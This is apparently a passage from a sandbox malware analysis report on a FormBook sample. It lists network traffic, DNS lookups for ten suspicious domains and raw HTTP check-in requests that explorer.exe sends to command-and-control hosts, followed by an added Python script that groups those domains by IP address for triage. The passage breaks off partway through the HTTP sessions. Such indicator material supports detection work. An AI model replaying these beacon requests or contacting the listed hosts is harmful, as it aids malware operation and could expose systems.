Sep 15, 2021 10:10:45.753977060 CEST | 80 | 49792 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:45.754204988 CEST | 49792 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:45.754266024 CEST | 49792 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:45.773391962 CEST | 80 | 49792 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:45.871160984 CEST | 80 | 49792 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:45.872540951 CEST | 49792 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:45.872602940 CEST | 80 | 49792 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:45.872720003 CEST | 49792 | 80 | 192.168.2.3 | 34.98.99.30
Sep 15, 2021 10:10:45.891458988 CEST | 80 | 49792 | 34.98.99.30 | 192.168.2.3
Sep 15, 2021 10:10:50.911632061 CEST | 49793 | 80 | 192.168.2.3 | 91.195.240.94
Sep 15, 2021 10:10:50.930871964 CEST | 80 | 49793 | 91.195.240.94 | 192.168.2.3
Sep 15, 2021 10:10:50.930979013 CEST | 49793 | 80 | 192.168.2.3 | 91.195.240.94
Sep 15, 2021 10:10:50.931049109 CEST | 49793 | 80 | 192.168.2.3 | 91.195.240.94

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 15, 2021 10:08:25.316128016 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:08:25.350845098 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:08:52.204672098 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:08:52.235321045 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:08:57.434880018 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:08:57.477111101 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:09:18.122143984 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:09:18.162800074 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:09:23.468075037 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:09:23.512341022 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:09:35.609021902 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:09:35.639624119 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:09:57.940447092 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:09:58.132829905 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:10:03.536367893 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:10:03.597603083 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:10:08.785339117 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:10:08.826334000 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:10:10.227674961 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:10:10.265500069 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:10:11.977534056 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:10:12.013201952 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:10:14.004148006 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:10:14.038501024 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:10:19.195137978 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:10:19.232110977 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:10:24.317293882 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:10:24.501940012 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:10:30.179683924 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:10:30.254374981 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:10:40.425901890 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:10:40.488056898 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:10:45.692493916 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:10:45.730973005 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Sep 15, 2021 10:10:50.880100965 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Sep 15, 2021 10:10:50.911007881 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 15, 2021 10:09:57.940447092 CEST | 192.168.2.3 | 8.8.8.8 | 0xf5c4 | Standard query (0) | www.cherrybunk.life | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:03.536367893 CEST | 192.168.2.3 | 8.8.8.8 | 0x1fab | Standard query (0) | www.d0berman245.xyz | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:08.785339117 CEST | 192.168.2.3 | 8.8.8.8 | 0x85e0 | Standard query (0) | www.fraktal.media | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:14.004148006 CEST | 192.168.2.3 | 8.8.8.8 | 0xd94 | Standard query (0) | www.expertexceleratorchallenge.com | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:19.195137978 CEST | 192.168.2.3 | 8.8.8.8 | 0xeaa | Standard query (0) | www.hellocharmaine.com | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:24.317293882 CEST | 192.168.2.3 | 8.8.8.8 | 0xd2e9 | Standard query (0) | www.syzhtr.com | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:30.179683924 CEST | 192.168.2.3 | 8.8.8.8 | 0x5b41 | Standard query (0) | www.tjandamber.com | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:40.425901890 CEST | 192.168.2.3 | 8.8.8.8 | 0x36e1 | Standard query (0) | www.realstylecelebz.com | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:45.692493916 CEST | 192.168.2.3 | 8.8.8.8 | 0x881b | Standard query (0) | www.dressmids.com | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:50.880100965 CEST | 192.168.2.3 | 8.8.8.8 | 0x1a3f | Standard query (0) | www.discomountainkombucha.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 15, 2021 10:09:58.132829905 CEST | 8.8.8.8 | 192.168.2.3 | 0xf5c4 | No error (0) | www.cherrybunk.life | - | 52.25.92.0 | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:03.597603083 CEST | 8.8.8.8 | 192.168.2.3 | 0x1fab | No error (0) | www.d0berman245.xyz | - | 99.83.154.118 | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:08.826334000 CEST | 8.8.8.8 | 192.168.2.3 | 0x85e0 | No error (0) | www.fraktal.media | fraktal.media | - | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 10:10:08.826334000 CEST | 8.8.8.8 | 192.168.2.3 | 0x85e0 | No error (0) | fraktal.media | - | 34.98.99.30 | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:14.038501024 CEST | 8.8.8.8 | 192.168.2.3 | 0xd94 | No error (0) | www.expertexceleratorchallenge.com | expertexceleratorchallenge.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 10:10:14.038501024 CEST | 8.8.8.8 | 192.168.2.3 | 0xd94 | No error (0) | expertexceleratorchallenge.com | - | 34.98.99.30 | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:19.232110977 CEST | 8.8.8.8 | 192.168.2.3 | 0xeaa | No error (0) | www.hellocharmaine.com | - | 91.195.240.94 | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:24.501940012 CEST | 8.8.8.8 | 192.168.2.3 | 0xd2e9 | No error (0) | www.syzhtr.com | - | 103.72.144.19 | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:30.254374981 CEST | 8.8.8.8 | 192.168.2.3 | 0x5b41 | No error (0) | www.tjandamber.com | tjandamber.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 10:10:30.254374981 CEST | 8.8.8.8 | 192.168.2.3 | 0x5b41 | No error (0) | tjandamber.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:40.488056898 CEST | 8.8.8.8 | 192.168.2.3 | 0x36e1 | No error (0) | www.realstylecelebz.com | - | 99.83.154.118 | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:45.730973005 CEST | 8.8.8.8 | 192.168.2.3 | 0x881b | No error (0) | www.dressmids.com | dressmids.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 10:10:45.730973005 CEST | 8.8.8.8 | 192.168.2.3 | 0x881b | No error (0) | dressmids.com | - | 34.98.99.30 | A (IP address) | IN (0x0001)
Sep 15, 2021 10:10:50.911007881 CEST | 8.8.8.8 | 192.168.2.3 | 0x1a3f | No error (0) | www.discomountainkombucha.com | - | 91.195.240.94 | A (IP address) | IN (0x0001)
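
The resolution pattern in the two tables above is easier to read once the answers are pivoted on address. The Python below is an added example written for this page; it is not output of the sandbox and not code from the FormBook family. It transcribes the DNS Queries and DNS Answers rows (a constructed list that keeps the tool's transaction IDs), follows the CNAME chain inside each transaction, and lists every address that more than one queried name lands on. FormBook samples walk a configured list of hostnames of which most are filler, so several names here sharing one address, and the sessions to 34.98.99.30 further down answering the check-in with identical openresty/Via: 1.1 google 403 pages, is the kind of clustering that helps separate filler entries from hosts worth a closer look. Shared hosting is only a hint, not proof: legitimate sites are co-located the same way, and the page does not say which of the ten names is the live server.

```python
"""Pivot the DNS answers of this report on resolved address (added example)."""
from collections import defaultdict

# Transcribed from the DNS Queries table: (transaction id, queried name).
DNS_QUERIES = [
    ("0xf5c4", "www.cherrybunk.life"),
    ("0x1fab", "www.d0berman245.xyz"),
    ("0x85e0", "www.fraktal.media"),
    ("0xd94", "www.expertexceleratorchallenge.com"),
    ("0xeaa", "www.hellocharmaine.com"),
    ("0xd2e9", "www.syzhtr.com"),
    ("0x5b41", "www.tjandamber.com"),
    ("0x36e1", "www.realstylecelebz.com"),
    ("0x881b", "www.dressmids.com"),
    ("0x1a3f", "www.discomountainkombucha.com"),
]

# Transcribed from the DNS Answers table:
# (transaction id, owner name, CNAME target or None, A address or None).
DNS_ANSWERS = [
    ("0xf5c4", "www.cherrybunk.life", None, "52.25.92.0"),
    ("0x1fab", "www.d0berman245.xyz", None, "99.83.154.118"),
    ("0x85e0", "www.fraktal.media", "fraktal.media", None),
    ("0x85e0", "fraktal.media", None, "34.98.99.30"),
    ("0xd94", "www.expertexceleratorchallenge.com", "expertexceleratorchallenge.com", None),
    ("0xd94", "expertexceleratorchallenge.com", None, "34.98.99.30"),
    ("0xeaa", "www.hellocharmaine.com", None, "91.195.240.94"),
    ("0xd2e9", "www.syzhtr.com", None, "103.72.144.19"),
    ("0x5b41", "www.tjandamber.com", "tjandamber.com", None),
    ("0x5b41", "tjandamber.com", None, "34.102.136.180"),
    ("0x36e1", "www.realstylecelebz.com", None, "99.83.154.118"),
    ("0x881b", "www.dressmids.com", "dressmids.com", None),
    ("0x881b", "dressmids.com", None, "34.98.99.30"),
    ("0x1a3f", "www.discomountainkombucha.com", None, "91.195.240.94"),
]


def resolve(txid, name, answers, depth=0):
    """Follow CNAME records for `name` within transaction `txid` and return
    the set of A addresses reached.  `depth` bounds CNAME loops."""
    if depth > 8:
        return set()
    addresses = set()
    for tid, owner, cname, addr in answers:
        if tid != txid or owner != name:
            continue
        if addr:
            addresses.add(addr)
        elif cname:
            addresses |= resolve(txid, cname, answers, depth + 1)
    return addresses


def names_by_address(queries, answers):
    """Map each final address to the sorted queried names that resolve to it."""
    grouped = defaultdict(set)
    for txid, qname in queries:
        for addr in resolve(txid, qname, answers):
            grouped[addr].add(qname)
    return {addr: sorted(names) for addr, names in grouped.items()}


def shared_hosting(queries, answers, min_names=2):
    """Addresses that at least `min_names` distinct queried names land on."""
    return {addr: names for addr, names in names_by_address(queries, answers).items()
            if len(names) >= min_names}


if __name__ == "__main__":
    for addr, names in sorted(shared_hosting(DNS_QUERIES, DNS_ANSWERS).items()):
        print(f"{addr:16} <- {', '.join(names)}")
```

Run stand-alone it prints the three addresses that carry more than one of the queried names; the four names with a unique address (52.25.92.0, 103.72.144.19, 34.102.136.180 and the two resolving to 91.195.240.94 are handled the same way) drop out of the shared view and are the ones to cross-check against the HTTP sessions.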

HTTP Request Dependency Graph

• www.cherrybunk.life
• www.d0berman245.xyz
• www.fraktal.media
• www.expertexceleratorchallenge.com
• www.hellocharmaine.com
• www.syzhtr.com
• www.tjandamber.com
• www.realstylecelebz.com
• www.dressmids.com
• www.discomountainkombucha.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49780 | 52.25.92.0 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 10:09:58.335856915 CEST | 4134 | OUT | GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz HTTP/1.1
                                            Host: www.cherrybunk.life
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
Sep 15, 2021 10:09:58.520955086 CEST | 4136 | IN | HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 15 Sep 2021 08:09:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Data Raw: 61 33 61 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 70 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 77 77 77 2e 63 68 65 72 72 79 62 75 6e 6b 2e 6c 69 66 65 20 69 73 20 45 78 70 69 72 65 64 20 6f 72 20 53 75 73 70 65 6e 64 65 64 2e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 39 5d 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 2e 67 72 61 64 69 65 6e 74 20 7b 0a 09 09 09 66 69 6c 74 65 72 3a 20 6e 6f 6e 65 3b 0a 09 09 7d 0a 09 3c 2f 73 74 79 6c 65 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 21 2d 2d 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 6c 61 63 6b 62 6f 61 72 64 22 3e 2d 2d 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 74 6f 6b 79 6f 31 22 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 66 75 6c 62 6f 78 2e 6a 70 2f 3f 61 64 72 65 66 3d 6e 73 65 78 70 5f 61 64 26 61 72 67 75 6d 65 6e 74 3d 44 4c 48 74 73 72 67 7a 26 64 6d 61 69 3d 61 35 62 35 61 38 30 39 31 36 38 38 38 36 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 63 6c 61 73 73 3d 22 62 6e 72 4c 69 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 69 6d 67 20 73 
72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 66 75 6c 62 6f 78 2e 6a 70 2f 63 6f 6d 6d 6f 6e 2f 69 6d 67 2f 62 6e 72 2f 63 6f 6c 6f 72 66 75 6c 62 6f 78 5f 62 6e 72 30 31 2e 70 6e 67 22 20 61 6c 74 3d 22 e7 94 bb e5 83 8f 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 76 61 6c 69 64 22 3e 0a 09 3c 68 31 3e 0a 09 09 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 69 6d 67 30 31 2e 70 6e 67 22 20 61 6c 74 3d 22 e7 94 bb e5 83 8f 22 3e 0a 09 09 3c 70 3e e3 83 89 e3 83 a1 e3 82 a4 e3 83 b3 e3 81 8c e7 84 a1 e5 8a b9 e3 81 aa e7 8a b6 e6 85 8b e3 81 a7 e3 81 99 e3 80 82 3c 2f 70 3e 0a 09 3c 2f 68 31 3e 0a 09 3c 64 69 76 3e 0a 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 78 74 30 31 22 3e e3 80 8c 20 3c 73 70 61 6e 3e 77 77 77 2e 63 68 65 72 72 79 62 75 6e 6b 2e 6c 69 66 65 3c 2f 73 70 61 6e 3e 20 e3 80 8d e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 af e3 80 81 e3 83 89 e3 83 a1 e3 82 a4 e3 83 b3 e3 81 8c e7 84 a1 e5 8a b9 e3 81 aa e7 8a b6 e6 85 8b e3 81 a7 e3 81 99 e3 80 82 3c 62 72 3e e3 82 a6 e3 82 a7 e3 83 96 e3 82 b5 e3 82 a4 e3 83 88 e7 ae a1 e7 90 86 e8 80 85 e3 81 ae e6 96 b9 e3 81 af 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 61 6c 75 65 2d 64 6f 6d 61 69 6e 2e 63 6f 6d 2f 6d 6f 64 61 6c 6c 2e 70 68 70 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e e3 81 93 e3 81 a1 e3 82 89 e3 81 8b e3 82 89 e5 a4 89 e6 9b b4 e3 83 bb e6 9b b4 e6 96 b0 3c 2f 61 3e e3 82 92 e8 a1 8c e3 81 a3 e3 81 a6 e3 81 8f e3 81 a0 e3
                                            Data Ascii: a3a<!doctype html><html lang="jp"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>www.cherrybunk.life is Expired or Suspended.</title><link rel="stylesheet" type="text/css" href="style.css"><meta name="robots" content="noindex" />...[if gte IE 9]><style type="text/css">.gradient {filter: none;}</style><![endif]--></head>...<body class="blackboard">--><body class="tokyo1"><a href="https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886" target="_blank" class="bnrLink" rel="nofollow"><img src="https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png" alt=""></a><div class="invalid"><h1><img src="img/img01.png" alt=""><p></p></h1><div><p class="txt01"> <span>www.cherrybunk.life</span> <br><a href="https://www.value-domain.com/modall.php" target="_blank" rel="nofollow"></a>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49781 | 99.83.154.118 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 10:10:03.618793011 CEST | 4138 | OUT | GET /vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo HTTP/1.1
                                            Host: www.d0berman245.xyz
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
Sep 15, 2021 10:10:03.777625084 CEST | 4138 | IN | HTTP/1.1 403 Forbidden
                                            Date: Wed, 15 Sep 2021 08:10:03 GMT
                                            Content-Type: text/html
                                            Content-Length: 146
                                            Connection: close
                                            Server: nginx
                                            Vary: Accept-Encoding
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49782 | 34.98.99.30 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 10:10:08.849975109 CEST | 4140 | OUT | GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB HTTP/1.1
                                            Host: www.fraktal.media
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
Sep 15, 2021 10:10:08.965112925 CEST | 4141 | IN | HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 15 Sep 2021 08:10:08 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6139ed55-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                            3           192.168.2.3  49787        34.98.99.30     80                C:\Windows\explorer.exe
                                            Timestamp                             kBytes transferred  Direction  Data
                                            Sep 15, 2021 10:10:14.066011906 CEST  4161                OUT        GET /vuja/?a6PLdH6=QFFty8wvqhCytrBgHARX2ZkDyAOTnUZPmU5cb5PMMJEj0bAx9fBxVhYMw+XdeJtryV9Z&SrK0m=8pbLu8l0SV1lo HTTP/1.1
                                            Host: www.expertexceleratorchallenge.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:14.181255102 CEST  4162                IN         HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 15 Sep 2021 08:10:14 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6139efab-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                            4           192.168.2.3  49788        91.195.240.94   80                C:\Windows\explorer.exe
                                            Timestamp                             kBytes transferred  Direction  Data
                                            Sep 15, 2021 10:10:19.252830982 CEST  4163                OUT        GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY HTTP/1.1
                                            Host: www.hellocharmaine.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:19.290005922 CEST  4164                IN         HTTP/1.1 301 Moved Permanently
                                            Content-Type: text/html; charset=utf-8
                                            Location: https://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY
                                            Date: Wed, 15 Sep 2021 08:10:19 GMT
                                            Content-Length: 172
                                            Connection: close
                                            Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 65 6c 6c 6f 63 68 61 72 6d 61 69 6e 65 2e 63 6f 6d 2f 76 75 6a 61 2f 3f 53 72 4b 30 6d 3d 38 70 62 4c 75 38 6c 30 53 56 31 6c 6f 26 61 6d 70 3b 61 36 50 4c 64 48 36 3d 48 69 46 32 4a 6d 56 32 6f 77 50 71 38 48 65 76 59 2b 36 50 4c 48 30 6c 33 4b 67 69 44 62 74 66 38 58 4f 6f 4f 4d 58 76 52 58 67 56 44 78 44 4c 78 6a 57 65 62 48 49 39 50 77 34 38 38 76 4d 6b 39 4f 52 59 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                            Data Ascii: <a href="https://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&amp;a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY">Moved Permanently</a>.


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                            5           192.168.2.3  49789        103.72.144.19   80                C:\Windows\explorer.exe
                                            Timestamp                             kBytes transferred  Direction  Data
